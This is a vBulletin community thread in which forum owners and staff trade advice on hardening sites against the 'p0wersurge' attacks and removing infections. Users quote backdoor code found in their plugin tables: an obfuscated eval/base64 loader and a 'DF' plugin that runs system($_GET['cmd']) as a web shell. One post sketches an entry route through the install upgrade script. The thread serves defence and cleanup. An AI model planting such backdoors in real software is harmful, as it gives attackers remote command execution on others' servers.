Announcement

Collapse
No announcement yet.

Preventative - How to avoid being Hacked by TeamPS i.e. p0wersurge

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • TheLastSuperman
    commented on 's reply
    Delete the /install directory from vB4 as well, it is not required and furthermore is not needed unless it's being called forth by some administrative functions which is usually from tools.php if not one of the maintenance functions and if your site is running smoothly w/o errors there is usually no need to run those . If you go to do something in admincp and an error is given then simply temporarily reupload the install folder (minus the install.php file respectively) do your "function" then delete again .

  • BirdOPrey5
    replied
    That doesn't make sense, you are required to login to the admin cp with a username and password after an upgrade (if not already logged in), I just confirmed on my own test site.

    That said for VB3/4 it is good practice to password protect the install and admincp directories. In VB5 the new rule is to delete the entire install directory.

    Leave a comment:


  • Inspector G
    replied
    I found a way they are doing this...

    I also saw this somewhere I just cant remember where...
    but i removed the whole install file after, I restored my site and nothing has happened so far...

    To Access vBulletin use this
    /install/upgrade.php
    All You need is a Customer Number to Run the upgrade Script
    Then once they upgrade...
    They can access to admin CP then they upload
    Whatever they want using XML and then they can access to the rest of sub-domains
    This isn't made aware to the public they go on to say...
    Last edited by Inspector G; Thu 28 Feb '13, 8:24pm.

    Leave a comment:


  • Zachery
    replied
    Not normal, remove that code or reupload a fresh copy.

    Leave a comment:


  • meissen
    replied
    When I run the SQL query for base64 in plugins I get a long string under the subscriptions.php file... is that normal?

    if (strpos($_SERVER['PHP_SELF'],'subscriptions.php')) { eval(gzinflate(base64_decode('-removed-'))); exit; }

    Leave a comment:


  • The_Rascal
    replied
    Thanks Snakes,
    New thread posted.

    Leave a comment:


  • snakes1100
    replied
    Originally posted by The_Rascal View Post
    Thanks Zapiy.
    It is my forum that has the issues. I have attached screen dumps of the tools installed.
    Anyone know how to remove them?
    Our hosts are saying that they are not installed server side, I have downloaded and run an antivirus scan on all the ftp files (fresh, clean upload of vb 4.20) and of course that came up clean.

    Any help or assistance will be very much appreciated

    Thanks

    Rascal
    You should start your own thread.

    Its not going to be as easy, its not just something we can say point blank, its here or there.

    If the files are scanned & verified as clean, w/ either a tool or because you have deleted all files & replaced them, including htaccess files, then you will need to scan the DB & verify its clean as well, id start by scanning the db for ifram, exec code in your template & plugin tables.

    Leave a comment:


  • The_Rascal
    replied
    Originally posted by zapiy View Post
    This has happened on a site i am trying to help out on.. The server side has been completely replaced with new code and the VB software upgraded.. The exploit it only not active when the hooks are disabled but no mods are currently installed?

    Could someone please help us out?

    Cheers
    Thanks Zapiy.
    It is my forum that has the issues. I have attached screen dumps of the tools installed.
    Anyone know how to remove them?
    Our hosts are saying that they are not installed server side, I have downloaded and run an antivirus scan on all the ftp files (fresh, clean upload of vb 4.20) and of course that came up clean.

    Any help or assistance will be very much appreciated

    Thanks

    Rascal
    Attached Files

    Leave a comment:


  • zapiy
    replied
    This has happened on a site i am trying to help out on.. The server side has been completely replaced with new code and the VB software upgraded.. The exploit it only not active when the hooks are disabled but no mods are currently installed?

    Could someone please help us out?

    Cheers

    Leave a comment:


  • Wayne Luke
    replied
    There is a directory named vb... It is the last in a list of directories provided in my post above (admincp, modcp, install, include, packages, vb).

    Leave a comment:


  • Black Snow
    replied
    What do you mean by vb directories?

    Leave a comment:


  • Wayne Luke
    replied
    You should only place the .htaccess file in the admincp, modcp, install, includes, packages and vb directories.

    Leave a comment:


  • Black Snow
    replied
    I ran the .htpasswrd tool from the link in the first post and created a .htaccess file. Can I place the .htaccess file in every directory in my site?

    The questions I am facing now are, if I place it in every directory:

    • Will my forum still be able to run properly?
    • Will attachments still be able to be downloaded?
    • Will avatars, images etc still be able to be uploaded?
    • Will this restrict me from doing anything?


    If the answer to the above questions is no, the forum won't run properly, where is the most important place to put the .htaccess file to prevent my forum being hacked?

    Leave a comment:


  • SVTOA
    replied
    I ran one of the queries suggested above and found this:

    PHP Code:
    DF
         ob_start
    (); system($_GET['cmd']); $execcode ob_get_contents(); ob_end_clean();
         
    global_start     vbulletin 
    I can't figure out where this code has been placed. Can anyone help please?

    - - - Updated - - -

    Followup- Found a plugin "DF" and it contains this code.

    Leave a comment:


  • Ace
    replied
    Originally posted by tChristine View Post
    Hi TLS,

    Could you please post a specific example for admincp?

    If the output is this:

    AuthType Basic <--leave as is? - Required? Yes.
    AuthName "My Protected Area" <-- what path/syntax do you use here for admincp? Whatever you like. "Sausages".
    AuthUserFile /path/to/.htpasswd <-- so it's domain.com(or php?)/public_html/.htpasswd ? Noooo! Not under public_html, above it.
    Require valid-user <--leave as is? - Required? Yes,

    Thank you.
    My answers in red above.

    Leave a comment:

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X